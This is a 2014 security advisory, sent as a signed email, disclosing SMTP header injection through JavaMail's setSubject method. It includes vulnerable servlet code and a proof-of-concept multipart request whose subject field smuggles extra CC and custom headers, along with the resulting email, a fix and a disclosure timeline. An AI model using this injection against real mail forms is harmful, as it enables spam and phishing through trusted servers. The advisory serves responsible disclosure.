JavaMail SMTP Header Injection via method setSubject [CSNC-2014-
--PGP_Universal_3E0310EC_A6C05101_4C64BDD0_39AA3210
Content-Type: text/plain;
charset="utf-8"
Content-Transfer-Encoding: QUOTED-PRINTABLE
#############################################################
#
# COMPASS SECURITY ADVISORY
# http://www.csnc.ch/en/downloads/advisories.html
#
#############################################################
#
# Product: JavaMail
# Vendor: Oracle
# CSNC ID: CSNC-2014-001=20
# CVD ID: <none>
# Subject: SMTP Header Injection via method setSubject
# Risk: Medium
# Effect: Remotely exploitable
# Author: Alexandre Herzog <alexandre.herzog@csnc.ch>
# Date: 19.05.2014
#
#############################################################
Introduction:
-------------
The JavaMail API provides a platform-independent and=20
protocol-independent framework to build mail and messaging applications.=20
The JavaMail API is available as an optional package for use with the=20
Java SE platform and is also included in the Java EE platform.[1]=20
JavaMail does not check if the email subject contains a Carriage Return=20
(CR) or a Line Feed (LF) character on POST multipart requests. This=20
issue allows the injection of arbitrary SMTP headers in the generated
email. This flaw can be used for sending SPAM or other social=20
engineering attacks (e.g. abusing a trusted server to send HTML emails
with malicious content).=20
Affected:
---------
The following versions of JavaMail were tested and found vulnerable:
- 1.4.5 (included in the .war file used as demo from [2])
- 1.5.1 (latest version downloaded on 31.12.2013 from [3])
=20
Technical Description
---------------------
The tests were performed using the .war file downloaded from [2]. That=20
code features an example on how to send a file per email using JSP and
a servlet. The relevant parts of this example are:
[...]
/**
* A utility class for sending e-mail message with attachment.
* @author www.codejava.net
*
*/
public class EmailUtility {
=20
/**
* Sends an e-mail message from a SMTP host with a list of attached files.
*
*/
public static void sendEmailWithAttachment(String host, String port,
final String userName, final String password, String toAddress,
String subject, String message, List<File> attachedFiles)
throws AddressException, MessagingException {
// sets SMTP server properties
Properties properties =3D new Properties();
properties.put("mail.smtp.host", host);
properties.put("mail.smtp.port", port);
properties.put("mail.smtp.auth", "true");
properties.put("mail.smtp.starttls.enable", "true");
properties.put("mail.user", userName);
properties.put("mail.password", password);
=20
// creates a new session with an authenticator
Authenticator auth =3D new Authenticator() {
public PasswordAuthentication getPasswordAuthentication() {
return new PasswordAuthentication(userName, password);
}
};
Session session =3D Session.getInstance(properties, auth);
=20
// creates a new e-mail message
Message msg =3D new MimeMessage(session);
=20
msg.setFrom(new InternetAddress(userName));
InternetAddress[] toAddresses =3D { new InternetAddress(toAddress) };
msg.setRecipients(Message.RecipientType.TO, toAddresses);
=3D=3D> msg.setSubject(subject);
msg.setSentDate(new Date());
[...]
=09
[...]
/**
* A servlet that takes message details from user and send it as a new e-m=
ail
* through an SMTP server. The e-mail message may contain attachments which
* are the files uploaded from client.
*
* @author www.codejava.net
*
*/
@WebServlet("/SendMailAttachServlet")
=09
// CSNC comment - this tag enables the processing of POST multipart reques=
ts
@MultipartConfig(fileSizeThreshold =3D 1024 * 1024 * 2, // 2MB
maxFileSize =3D 1024 * 1024 * 10, // 10MB
maxRequestSize =3D 1024 * 1024 * 50) // 50MB
public class SendMailAttachServlet extends HttpServlet {
private String host;
private String port;
private String user;
private String pass;
=20
public void init() {
// reads SMTP server setting from web.xml file
ServletContext context =3D getServletContext();
host =3D context.getInitParameter("host");
port =3D context.getInitParameter("port");
user =3D context.getInitParameter("user");
pass =3D context.getInitParameter("pass");
}
=20
/**
* handles form submission
*/
protected void doPost(HttpServletRequest request,
HttpServletResponse response) throws ServletException, IOException {
=20
List<File> uploadedFiles =3D saveUploadedFiles(request);
=20
String recipient =3D request.getParameter("recipient");
=3D=3D> String subject =3D request.getParameter("subject");
String content =3D request.getParameter("content");
=20
String resultMessage =3D "";
=20
try {
=3D=3D> EmailUtility.sendEmailWithAttachment(host, port, user, pass,
recipient, subject, content, uploadedFiles);
=20
resultMessage =3D "The e-mail was sent successfully";
} catch (Exception ex) {
Below is a genuine request POST request for the example above, done
using "Content-Type: multipart" as it involves uploading a file:=20
POST /EmailAttachWebApp/SendMailAttachServlet HTTP/1.1
Host: localhost:8080
[...]
Connection: keep-alive
Content-Type: multipart/form-data; boundary=3D---------------------------2=
05721274512326
Content-Length: 1785
-----------------------------205721274512326
Content-Disposition: form-data; name=3D"recipient"
test@[redacted]
-----------------------------205721274512326
Content-Disposition: form-data; name=3D"subject"
With javax.mail.1.5.1
-----------------------------205721274512326
Content-Disposition: form-data; name=3D"content"
SMTP header injection test
-----------------------------205721274512326
Content-Disposition: form-data; name=3D"file"; filename=3D"NOTICE"
Content-Type: application/octet-stream
Apache Tomcat
Copyright 1999-2012 The Apache Software Foundation=20
[...]
=09
=09
"Content-Type: multipart" allows us to submit a string containing a CR=20
or LF without having to use HEX characters %0A and %0D nor \n and \r. In=20
the JavaMail case, we abuse this feature to inject additional SMTP=20
headers through the Subject parameter in the request:=20
POST /EmailAttachWebApp/SendMailAttachServlet HTTP/1.1
Host: localhost:8080
[...]
Connection: keep-alive
Content-Type: multipart/form-data; boundary=3D---------------------------2=
05721274512326
Content-Length: 1839
-----------------------------205721274512326
Content-Disposition: form-data; name=3D"recipient"
test@[redacted]
-----------------------------205721274512326
Content-Disposition: form-data; name=3D"subject"
With javax.mail.1.5.1
=3D=3D> CC: injected.header@[redacted]
=3D=3D> X-other-header: foo bar
-----------------------------205721274512326
Content-Disposition: form-data; name=3D"content"
SMTP header injection test
-----------------------------205721274512326
Content-Disposition: form-data; name=3D"file"; filename=3D"NOTICE"
Content-Type: application/octet-stream
Apache Tomcat
Copyright 1999-2012 The Apache Software Foundation
[...]
=09
This email is sent successfully and is received by the recipient under=20
the following form, where the injected SMTP headers are clearly visible:=20
[...]
From: [redacted]@gmail.com
To: test@[redacted]
Message-ID: <52c2e778.01030e0a.7154.fffff0c2@mx.google.com>
Subject: With javax.mail.1.5.1
CC: injected.header@[redacted]
=3D=3D> X-other-header: foo bar
MIME-Version: 1.0
Content-Type: multipart/mixed;=20
boundary=3D"----=3D_Part_0_1681986934.1388504951836"
[...]
------=3D_Part_0_1681986934.1388504951836
Content-Type: text/html; charset=3Dus-ascii
Content-Transfer-Encoding: 7bit
SMTP header injection test
------=3D_Part_0_1681986934.1388504951836
Content-Type: application/octet-stream; name=3DNOTICE
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename=3DNOTICE
Apache Tomcat
Copyright 1999-2012 The Apache Software Foundation
[...]
The same behavior can be observed when using JavaMail 1.4.5 (bundled by=20
default in the example .war [2]) instead of the latest 1.5.1 JavaMail=20
version.=20
Workaround / Fix:
-----------------
Ensure your application strictly follows the JavaMail API and ensures=20
the subject string does not contain any line breaks (as stated in some=20
parts of the API [4]). An alternative would be to fix the setSubject=20
method of JavaMail by either disallowing the usage of CR/LF characters=20
or appending a space after each CR/LF character to be RFC compliant (see=20
2.2.3 Long Header Fields of RFC 2822 [5]).=20
Oracle issued the following statement regarding this matter: "The=20
assessment from our engineering team is that this is not a bug in=20
JavaMail API. The application is responsible to perform some input=20
validation. In this particular case, the application is responsible for=20
ensuring that the subject string does not contain any line breaks. The=20
code demonstrated the issue is not an Oracle sample. Therefore, we are=20
closing the issue as not-a-bug."=20
Timeline:
---------
2014-05-19: Global publication of the advisory
2014-03-19: Advisory sent to Compass Security's customers
2014-02-19: Got confirmation from Oracle they agree our publication
schedule
2014-02-18: Informed Oracle that we plan to publish details of this
issue to our customer this week and to the general
public in a month
2014-02-05: Informed Oracle we consider publishing this information
2014-02-04: Response from Oracle: is not considered a bug
2014-01-23: Status report from Oracle mentioning the case being
"Under investigation / Being fixed in main codeline"
2014-01-01: Reception acknowledgement from Oracle
2014-01-01: Sending advisory and PoC to Oracle
2014-01-01: Isolation and reproduction of an issue discovered
previously by the author
References:
-----------
[1] http://www.oracle.com/technetwork/java/javamail/index.html
[2] http://www.codejava.net/java-ee/jsp/send-attachments-with-e-mail-using-=
jsp-servlet-and-javamail
[3] https://java.net/projects/javamail/pages/Home
[4] https://javamail.java.net/nonav/docs/api/javax/mail/internet/MimeMessag=
e.html#setSubject(java.lang.String)
[5] http://www.ietf.org/rfc/rfc2822.txt
--
Alexandre Herzog, CTO, Compass Security Schweiz AG
Werkstrasse 20, 8645 Jona, Switzerland
Schauplatzgasse 39, 3011 Bern, Switzerland
http://www.csnc.ch/
--PGP_Universal_3E0310EC_A6C05101_4C64BDD0_39AA3210
Content-Type: application/x-pkcs7-signature;
name="smime.p7s"
Content-Transfer-Encoding: BASE64
Content-Disposition: attachment;
filename="smime.p7s"
MIIUbgYJKoZIhvcNAQcCoIIUXzCCFFsCAQExCzAJBgUrDgMCGgUAMAsGCSqGSIb3DQEHAaCCEisw
ggX7MIIE46ADAgECAg8UfWk+WS1zUuKnrVuz6DMwDQYJKoZIhvcNAQEFBQAwVTELMAkGA1UEBhMC
Q0gxFTATBgNVBAoTDFN3aXNzU2lnbiBBRzEvMC0GA1UEAxMmU3dpc3NTaWduIFBlcnNvbmFsIFNp
bHZlciBDQSAyMDA4IC0gRzIwHhcNMTIwODIwMTMzNzE1WhcNMTUwODIwMTMzNzE1WjBJMR0wGwYD
VQQLExRFbWFpbCBWYWxpZGF0ZWQgT25seTEoMCYGA1UEAxQfRW1haWw6IGFsZXhhbmRyZS5oZXJ6
b2dAY3NuYy5jaDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALqVR5S0xl0UAv+6gtSt
e1I3nnc5+hUMrkI2r2L9xjYlTeZHBFdiUwbQtb6dFBEiBezHL1Po1fYANgpiSmEqBAX5pSesw1Zw
tyM8BXn5iHb+V0nuExh0sdJPzwNzDtDhGA3RvqvCbUQO7yjEMTmbj/n9ZpBbDaUstP6qG93aOKUo
IAnkG/KL1NulzNlVB/V2basvfN6N+RDQn/Rdm7xhdb9yxTGEk5dwde3TVHybHT9l/+9n/DRa2NGb
R2VEn+2JNJSaXfqWuVnLmpBd2WgJMoWj9SESNw/m3JHkIEmQZPS+ZD2U/6QZ4rJxJFIRfG//bdvv
Xd9FzQhJE5y7/X0OBYkCAwEAAaOCAtIwggLOMA4GA1UdDwEB/wQEAwIEsDATBgNVHSUEDDAKBggr
BgEFBQcDBDAdBgNVHQ4EFgQU4s2q9ipX6Z3a/8IknZDSIoAnSXUwHwYDVR0jBBgwFoAU6zWxVm0V
YFj04SLNHEYcrtAEAGUwgf8GA1UdHwSB9zCB9DBHoEWgQ4ZBaHR0cDovL2NybC5zd2lzc3NpZ24u
bmV0L0VCMzVCMTU2NkQxNTYwNThGNEUxMjJDRDFDNDYxQ0FFRDAwNDAwNjUwgaiggaWggaKGgZ9s
ZGFwOi8vZGlyZWN0b3J5LnN3aXNzc2lnbi5uZXQvQ049RUIzNUIxNTY2RDE1NjA1OEY0RTEyMkNE
MUM0NjFDQUVEMDA0MDA2NSUyQ089U3dpc3NTaWduJTJDQz1DSD9jZXJ0aWZpY2F0ZVJldm9jYXRp
b25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJpYnV0aW9uUG9pbnQwZAYDVR0gBF0wWzBZ
BglghXQBWQEDAQQwTDBKBggrBgEFBQcCARY+aHR0cDovL3JlcG9zaXRvcnkuc3dpc3NzaWduLmNv
bS9Td2lzc1NpZ24tU2lsdmVyLUNQLUNQUy1SNC5wZGYwgdkGCCsGAQUFBwEBBIHMMIHJMGQGCCsG
AQUFBzAChlhodHRwOi8vc3dpc3NzaWduLm5ldC9jZ2ktYmluL2F1dGhvcml0eS9kb3dubG9hZC9F
QjM1QjE1NjZEMTU2MDU4RjRFMTIyQ0QxQzQ2MUNBRUQwMDQwMDY1MGEGCCsGAQUFBzABhlVodHRw
Oi8vc2lsdmVyLXBlcnNvbmFsLWcyLm9jc3Auc3dpc3NzaWduLm5ldC9FQjM1QjE1NjZEMTU2MDU4
RjRFMTIyQ0QxQzQ2MUNBRUQwMDQwMDY1MCMGA1UdEQQcMBqBGGFsZXhhbmRyZS5oZXJ6b2dAY3Nu
Yy5jaDANBgkqhkiG9w0BAQUFAAOCAQEAZeCO3sFVqf5Pv8dKExUN4DsukKwEfhYis7JgmIVwzYh7
7od8WfsexqL904pvuPKN5NYbW2M7gWBBV6m6mhFDhFM2mKGkeO/een3xrznoYaNsdcZAmIFeiL7e
daJ+cLbJDSreER6pHuzZmcfMUZxotylaYCqKJ1J73RWaUFQwBZg/lO0mErC3uZQr9IdJppAzy8d/
zb9qTBCNDGNPjY0ks1xyXIF9DEXAw0AiweNVAs5kOcMVB7gNFLJazRXcMrVmzo3jpzgB0EGnmsUE
+lTjn4XKVQzgiYPmhYwZrYCDECtQiSilSkBQfauYgF8dKrGiih0sOJLU3ZC5HysqeZKdWjCCBmcw
ggRPoAMCAQICCQDiVrdTl2t2WDANBgkqhkiG9w0BAQUFADBHMQswCQYDVQQGEwJDSDEVMBMGA1UE
ChMMU3dpc3NTaWduIEFHMSEwHwYDVQQDExhTd2lzc1NpZ24gU2lsdmVyIENBIC0gRzIwHhcNMDgw
NzA5MTExMTA5WhcNMjMwNzA5MTExMTA5WjBVMQswCQYDVQQGEwJDSDEVMBMGA1UEChMMU3dpc3NT
aWduIEFHMS8wLQYDVQQDEyZTd2lzc1NpZ24gUGVyc29uYWwgU2lsdmVyIENBIDIwMDggLSBHMjCC
ASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAPfzU15JbYwD5ScXIRhgpXaUPxUQuCFAzzYz
rCpymo9hw2veekkIWD2A2DvwnR1BEAG/awdWGo2zPb9jujF+4nJGGGiH14VPoMl7E6nQOdGJ1jVn
aHbBX5YJzc86BdE/BgUK2hbyQ/KkBx2irIB1AZ2g6Pc0p7+25jloZlJHOSlNtJ3oKq0VYbSiMeAQ
kdse5EPxK94QwTTLbITuYhQnRNgx8d88IczArJBo03RoyRdKjjsJp7EFZY0HpJCuLnreekRvsAL+
dP8ah/VY6aYl8cyIIifYyzHBLygMcXIe9/sITm56Bawhfz8KWmb4v+UWFPkbm8SfujMNhpcVXa6h
Bo8CAwEAAaOCAkYwggJCMA4GA1UdDwEB/wQEAwIBBjASBgNVHRMBAf8ECDAGAQH/AgEAMB0GA1Ud
DgQWBBTrNbFWbRVgWPThIs0cRhyu0AQAZTAfBgNVHSMEGDAWgBQXoM3B5EG2Ols7y0WdvRzCmPqG
WDCB/wYDVR0fBIH3MIH0MEegRaBDhkFodHRwOi8vY3JsLnN3aXNzc2lnbi5uZXQvMTdBMENEQzFF
NDQxQjYzQTVCM0JDQjQ1OURCRDFDQzI5OEZBODY1ODCBqKCBpaCBooaBn2xkYXA6Ly9kaXJlY3Rv
cnkuc3dpc3NzaWduLm5ldC9DTj0xN0EwQ0RDMUU0NDFCNjNBNUIzQkNCNDU5REJEMUNDMjk4RkE4
NjU4JTJDTz1Td2lzc1NpZ24lMkNDPUNIP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFzZT9v
YmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDBkBgNVHSAEXTBbMFkGCWCFdAFZAQMBAzBM
MEoGCCsGAQUFBwIBFj5odHRwOi8vcmVwb3NpdG9yeS5zd2lzc3NpZ24uY29tL1N3aXNzU2lnbi1T
aWx2ZXItQ1AtQ1BTLVIzLnBkZjB0BggrBgEFBQcBAQRoMGYwZAYIKwYBBQUHMAKGWGh0dHA6Ly9z
d2lzc3NpZ24ubmV0L2NnaS1iaW4vYXV0aG9yaXR5L2Rvd25sb2FkLzE3QTBDREMxRTQ0MUI2M0E1
QjNCQ0I0NTlEQkQxQ0MyOThGQTg2NTgwDQYJKoZIhvcNAQEFBQADggIBAC4qdtqX80zfZCfhWy2V
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
--PGP_Universal_3E0310EC_A6C05101_4C64BDD0_39AA3210--